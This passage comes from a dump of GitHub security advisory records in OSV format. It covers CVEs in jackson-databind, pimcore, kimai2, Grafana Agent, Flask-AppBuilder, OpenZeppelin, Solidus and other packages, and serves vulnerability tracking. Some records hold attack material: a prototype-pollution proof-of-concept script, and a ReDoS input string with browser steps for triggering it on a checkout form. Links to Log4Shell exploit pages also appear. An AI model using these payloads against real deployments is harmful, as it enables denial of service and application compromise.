'http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2022/Dec/2'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2022/Jul/11'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2022/Mar/23'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/12/10/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/12/10/2'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/12/10/3'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/12/13/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/12/13/2'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/12/14/4'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/12/15/3'}]","{'cwe_ids': ['CWE-20', 'CWE-400', 'CWE-502', 'CWE-917'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-12-10T00:40:41Z', 'nvd_published_at': '2021-12-10T10:15:00Z'}" +1.4.0,GHSA-9m6f-7xcq-8vf8,2023-09-14T16:15:43Z,2021-12-09T19:16:34Z,,['CVE-2020-36183'],Unsafe Deserialization in jackson-databind,"FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.00'}, {'fixed': '2.9.10.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.6.7.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36183'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/3003'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/12e23c962ffb4cf1857c5461d72ae54cc8008f29'}, {'type': 'WEB', 'url': 'https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210205-0005/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T23:27:59Z', 'nvd_published_at': '2021-01-07T00:15:00Z'}" +1.4.0,GHSA-2v2v-fx7r-f2fh,2021-12-14T14:45:36Z,2021-12-16T14:28:10Z,,['CVE-2021-4082'],pimcore is vulnerable to Cross-Site Request Forgery (CSRF),pimcore is vulnerable to Cross-Site Request Forgery (CSRF),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.2.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4082'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/3088cec7dc3cbc5a8b26f1269e398e799ee7ee28'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/81838575-e170-41fb-b451-92c1c8aab092'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T14:45:36Z', 'nvd_published_at': '2021-12-10T11:15:00Z'}" +1.4.0,GHSA-7qm6-9v49-38m9,2023-09-11T18:40:49Z,2021-12-10T18:55:39Z,,['CVE-2021-23402'],Prototype Pollution in record-like-deep-assign,"All versions of package record-like-deep-assign are vulnerable to Prototype Pollution via the main functionality. + +### PoC +```js +const deepAssign = require('record-like-deep-assign'); +let obj = {}; +console.log(""Before being polluted: "" + obj.polluted); +EVIL_JSON = JSON.parse('{""__proto__"":{""polluted"":true}}'); +deepAssign({}, EVIL_JSON); +console.log(""After being polluted: "" + obj.polluted); +```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'record-like-deep-assign'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23402'}, {'type': 'PACKAGE', 'url': 'https://github.com/kripod/record-like-deep-assign'}, {'type': 'WEB', 'url': 'https://github.com/kripod/record-like-deep-assign/blob/v1.0.1/src/mod.ts%23L17-L35'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-RECORDLIKEDEEPASSIGN-1311024'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-06T14:32:33Z', 'nvd_published_at': '2021-07-02T16:15:00Z'}" +1.4.0,GHSA-c69w-jj56-834w,2022-01-04T19:09:34Z,2021-12-16T14:12:49Z,,['CVE-2021-44549'],Improper Certificate Validation and Improper Validation of Certificate with Host Mismatch in Apache Sling Commons Messaging Mail,"Apache Sling Commons Messaging Mail provides a simple layer on top of JavaMail/Jakarta Mail for OSGi to send mails via SMTPS. To reduce the risk of ""man in the middle"" attacks additional server identity checks must be performed when accessing mail servers. For compatibility reasons these additional checks are disabled by default in JavaMail/Jakarta Mail. The SimpleMailService in Apache Sling Commons Messaging Mail 1.0 lacks an option to enable these checks for the shared mail session. A user could enable these checks nevertheless by accessing the session via the message created by SimpleMessageBuilder and setting the property mail.smtps.ssl.checkserveridentity to true. Apache Sling Commons Messaging Mail 2.0 adds support for enabling server identity checks and these checks are enabled by default. - https://javaee.github.io/javamail/docs/SSLNOTES.txt - https://javaee.github.io/javamail/docs/api/com/sun/mail/smtp/package-summary.html - https://github.com/eclipse-ee4j/mail/issues/429","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.sling:org.apache.sling.commons.messaging.mail'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-44549'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-ee4j/mail/issues/429'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse-ee4j'}, {'type': 'WEB', 'url': 'https://javaee.github.io/javamail/docs/SSLNOTES.txt'}, {'type': 'WEB', 'url': 'https://javaee.github.io/javamail/docs/api/com/sun/mail/smtp/package-summary.html'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/l8p9h2bqvkj6rhv4w8kzctb817415b7f'}]","{'cwe_ids': ['CWE-295', 'CWE-297'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-15T15:15:17Z', 'nvd_published_at': '2021-12-14T16:15:00Z'}" +1.4.0,GHSA-x68c-4gmm-5g43,2021-12-03T15:19:53Z,2021-12-03T20:40:38Z,,['CVE-2021-3985'],kimai2 is vulnerable to Cross-site Scripting,kimai2 is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'kevinpapst/kimai2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.16.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3985'}, {'type': 'WEB', 'url': 'https://github.com/kevinpapst/kimai2/commit/76e09447c85e762882126b49626a4fe4d93fe8b5'}, {'type': 'PACKAGE', 'url': 'https://github.com/kevinpapst/kimai2'}, {'type': 'WEB', 'url': 'https://github.com/kevinpapst/kimai2/releases/tag/1.16.3'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/89d6c3de-efbd-4354-8cc8-46e999e4c5a4'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-02T21:25:44Z', 'nvd_published_at': '2021-12-01T11:15:00Z'}" +1.4.0,GHSA-9c4x-5hgq-q3wh,2021-12-14T15:32:21Z,2021-12-08T19:52:40Z,,['CVE-2021-41090'],Instance config inline secret exposure in Grafana,"### Impact +Some inline secrets are exposed in plaintext over the Grafana Agent HTTP server: + +* Inline secrets for metrics instance configs in the base YAML file are exposed at `/-/config` +* Inline secrets for integrations are exposed at `/-/config` +* Inline secrets for Consul ACL tokens and ETCD basic auth when configured for the scraping service at `/-/config`. +* Inline secrets for the Kafka receiver for OpenTelemetry-Collector tracing at `/-/config`. +* Inline secrets for metrics instance configs loaded from the scraping service are exposed at `/agent/api/v1/configs/{name}`. + +Inline secrets will be exposed to anyone being able to reach these endpoints. + +Secrets found in these sections are used for: + +* Delivering metrics to a Prometheus Remote Write system +* Authenticating against a system for discovering Prometheus targets +* Authenticating against a system for collecting metrics (scrape_configs and integrations) +* Authenticating against a Consul or ETCD for storing configurations to distribute in scraping service mode +* Authenticating against Kafka for receiving traces + +Non-inlined secrets, such as `*_file`-based secrets, are not impacted by this vulnerability. + +### Patches + +Download [v0.20.1](https://github.com/grafana/agent/releases/tag/v0.20.1) or any version past [v0.21.2](https://github.com/grafana/agent/releases/tag/v0.21.2) to patch Grafana Agent. These patches obfuscate the listed impacted secrets from the vulnerable endpoints. + +The patches also disable the endpoints by default. Pass the command-line flag `--config.enable-read-api` to opt-in and re-enable the endpoints. + +### Workarounds +If for some reason you cannot upgrade, use non-inline secrets where possible. Not all configuration options may have a non-inline equivalent. + +You also may desire to restrict API access to Grafana Agent, with some combination of: + +* Restrict network interfaces Grafana Agent listens on through `http_listen_address` in the `server` block. `127.0.0.1` is the most restrictive, `0.0.0.0` is the default. +* Configure Grafana Agent to use HTTPS with client authentication. +* Use firewall rules to restrict external access to Grafana Agent's API.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/agent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.14.0'}, {'fixed': '0.21.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/grafana/agent/security/advisories/GHSA-9c4x-5hgq-q3wh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41090'}, {'type': 'WEB', 'url': 'https://github.com/grafana/agent/pull/1152'}, {'type': 'WEB', 'url': 'https://github.com/grafana/agent/commit/a5479755e946e5c7cddb793ee9adda8f5692ba11'}, {'type': 'WEB', 'url': 'https://github.com/grafana/agent/commit/af7fb01e31fe2d389e5f1c36b399ddc46b412b21'}, {'type': 'PACKAGE', 'url': 'https://github.com/grafana/agent'}, {'type': 'WEB', 'url': 'https://github.com/grafana/agent/releases/tag/v0.20.1'}, {'type': 'WEB', 'url': 'https://github.com/grafana/agent/releases/tag/v0.21.2'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211229-0004/'}]","{'cwe_ids': ['CWE-200', 'CWE-312'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-08T19:32:31Z', 'nvd_published_at': '2021-12-08T17:15:00Z'}" +1.4.0,GHSA-m3rf-7m4w-r66q,2021-12-09T18:14:23Z,2021-12-09T19:09:07Z,,['CVE-2021-41265'],Improper Authentication in Flask-AppBuilder,"### Impact +Improper authentication on the REST API. Allows for a malicious actor with a carefully crafted request to successfully authenticate and gain access to existing protected REST API endpoints. Only affects non database authentication types, and new REST API endpoints. + +### Patches +Upgrade to Flask-AppBuilder 3.3.4 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in https://github.com/dpgaspar/Flask-AppBuilder +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Flask-AppBuilder'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-m3rf-7m4w-r66q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41265'}, {'type': 'WEB', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder/commit/eba517aab121afa3f3f2edb011ec6bc4efd61fbc'}, {'type': 'PACKAGE', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder'}, {'type': 'WEB', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder/releases/tag/v3.3.4'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-09T18:14:23Z', 'nvd_published_at': '2021-12-09T17:15:00Z'}" +1.4.0,GHSA-9c22-pwxw-p6hx,2022-11-07T21:13:24Z,2021-12-14T21:47:33Z,,['CVE-2022-39384'],OpenZeppelin Contracts initializer reentrancy may lead to double initialization,"### Impact + +Initializer functions that are invoked separate from contract creation (the most prominent example being minimal proxies) may be reentered if they make an untrusted non-view external call. + +Once an initializer has finished running it can never be re-executed. However, an exception put in place to support multiple inheritance made reentrancy possible in the scenario described above, breaking the expectation that there is a single execution. + +Note that upgradeable proxies are commonly initialized together with contract creation, where reentrancy is not feasible, so the impact of this issue is believed to be minor. + +### Patches + +A fix is included in the version v4.4.1 of `@openzeppelin/contracts` and `@openzeppelin/contracts-upgradeable`. + +### Workarounds + +Avoid untrusted external calls during initialization. + +### References +https://github.com/OpenZeppelin/openzeppelin-contracts/pull/3006 + +### Credits + +This issue was identified and reported by @chaitinblockchain through [our bug bounty on Immunefi](https://immunefi.com/bounty/openzeppelin/). + +### For more information + +If you have any questions or comments about this advisory, or need assistance executing the mitigation, email us at security@openzeppelin.com. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': '@openzeppelin/contracts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '4.4.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@openzeppelin/contracts-upgradeable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '4.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/security/advisories/GHSA-9c22-pwxw-p6hx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-39384'}, {'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/pull/3006'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts'}]","{'cwe_ids': ['CWE-665'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T19:22:45Z', 'nvd_published_at': '2022-11-04T22:15:00Z'}" +1.4.0,GHSA-qxmr-qxh6-2cc9,2021-12-08T19:29:13Z,2021-12-07T22:01:47Z,,['CVE-2021-43805'],ReDos vulnerability on guest checkout email validation,"### Impact +Denial of service vulnerability that could be exploited during a guest checkout. The regular expression used to validate a guest order's email was subject to exponential backtracking through a fragment like `a.a.`. + +Before the patch, it can be reproduced in the console like this: + +```ruby +irb(main)> Spree::EmailValidator::EMAIL_REGEXP.match ""a@a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.@"" +processing time: 54.293660s +=> nil +``` + +To reproduce in the browser, fill in the ""Customer Email"" field with that fake email address during a guest checkout. Before that, you should open the browser dev tools and change the `type` attribute for that field from `email` to `text`. After entering a fake address and pressing the ""Save & Continue"" button, the browser will take a long term to perform the request before showing an error message for the invalid address. Eventually, making the email string even longer could lead to the exhaustion of server resources. + + +### Patches +Versions 3.1.4, 3.0.4, and 2.11.13 have been patched to use a different regular expression. + +There's an improbable chance that some orders in your system end up having associated an email address that is no longer valid. We've added a task to check precisely that: + +```bash +bin/rails solidus:check_orders_with_invalid_email +``` + +The above will print information for every affected order if any. + +### Workarounds + +If a prompt upgrade is not an option, please, add the following to `config/application.rb`: + +```ruby +config.after_initialize do + Spree::EmailValidator.send(:remove_const, :EMAIL_REGEXP) + Spree::EmailValidator::EMAIL_REGEXP = URI::MailTo::EMAIL_REGEXP +end +``` + +### References + +- https://en.wikipedia.org/wiki/ReDoS +- https://snyk.io/blog/redos-and-catastrophic-backtracking/ + +### For more information +If you have any questions or comments about this advisory: +* Open an [issue](https://github.com/solidusio/solidus/issues) or a [discussion](https://github.com/solidusio/solidus/discussions) in Solidus. +* Email us at [security@solidus.io](mailto:security@soliidus.io) +* Contact the core team on [Slack](http://slack.solidus.io/) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'solidus_core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.13'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'solidus_core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.4'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'solidus_core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.1.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/solidusio/solidus/security/advisories/GHSA-qxmr-qxh6-2cc9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43805'}, {'type': 'WEB', 'url': 'https://github.com/solidusio/solidus/commit/6be174c955fad84017ca67589c676526bc5ade71'}, {'type': 'WEB', 'url': 'https://github.com/solidusio/solidus/commit/9867153e01e3c3b898cdbcedd7b43375ea922401'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/solidus_core/CVE-2021-43805.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/solidusio/solidus'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-07T20:58:37Z', 'nvd_published_at': '2021-12-07T18:15:00Z'}" +1.4.0,GHSA-q6gq-997w-f55g,2021-06-18T22:05:40Z,2021-12-16T19:16:40Z,,['CVE-2020-16845'],Infinite loop in xz,Go before 1.13.15 and 14.x before 1.14.7 can have an infinite read loop in ReadUvarint and ReadVarint in encoding/binary via invalid inputs.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ulikunitz/xz'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-16845'}, {'type': 'WEB', 'url': 'https://github.com/ulikunitz/xz/issues/35'}, {'type': 'WEB', 'url': 'https://github.com/ulikunitz/xz/commit/69c6093c7b2397b923acf82cb378f55ab2652b9b'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/golang-announce/NyPIaucMgXo'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/golang-announce/_ulYYcIWg3Q'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/11/msg00037.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/11/msg00038.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6RCFJTMKHY5ICGEM5BUFUEDDGSPJ25XU/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KWRBAH4UZJO3RROQ72SYCUPFCJFA22FO/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TACQFZDPA7AUR6TRZBCX2RGRFSDYLI7O/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WV2VWKFTH4EJGZBZALVUJQJOAQB5MDQ4/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200924-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4848'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-08/msg00021.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-08/msg00028.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00029.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00030.html'}]","{'cwe_ids': ['CWE-835'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-18T22:05:40Z', 'nvd_published_at': '2020-08-06T18:15:00Z'}" +1.4.0,GHSA-wjpc-cgvw-xx23,2023-09-08T21:04:57Z,2021-12-16T14:29:34Z,,['CVE-2021-23663'],Prototype Pollution in sey,All versions of package `sey` are vulnerable to Prototype Pollution via the `deepmerge()` function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'sey'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23663'}, {'type': 'PACKAGE', 'url': 'https://github.com/eserozvataf/sey'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SEY-1727592'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T14:35:47Z', 'nvd_published_at': '2021-12-10T20:15:00Z'}" +1.4.0,GHSA-mf27-wg66-m8f5,2022-01-04T18:57:49Z,2021-12-17T20:41:09Z,,['CVE-2020-35210'],A vulnerability in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via a Raft session flooding attack using Raft OpenSessionRequest messages.,A vulnerability in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via a Raft session flooding attack using Raft OpenSessionRequest messages.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.atomix:atomix'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.1.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35210'}, {'type': 'WEB', 'url': 'https://docs.google.com/presentation/d/1eZznIciFI06_5UJrXvlLugH2-nmjfYpQO5NyNMc9RxU/edit?usp=sharing'}, {'type': 'PACKAGE', 'url': 'https://github.com/atomix/atomix'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-17T17:20:09Z', 'nvd_published_at': '2021-12-16T20:15:00Z'}" +1.4.0,GHSA-qjw2-hr98-qgfh,2022-04-08T22:16:20Z,2021-12-09T19:15:36Z,,['CVE-2020-24750'],Unsafe Deserialization in jackson-databind,"FasterXML jackson-databind 2.x before 2.6.7.5 and from 2.7.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0'}, {'fixed': '2.6.7.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.6.7.4'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.9.10.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.10.5'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-24750'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2798'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/2118e71325486c68f089a9761c9d8a11b4ddd1cb'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/6cc9f1a1af323cd156f5668a47e43bab324ae16f'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/ad5a630174f08d279504bc51ebba8772fd71b86b'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20201009-0003/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T23:41:09Z', 'nvd_published_at': '2020-09-17T19:15:00Z'}" 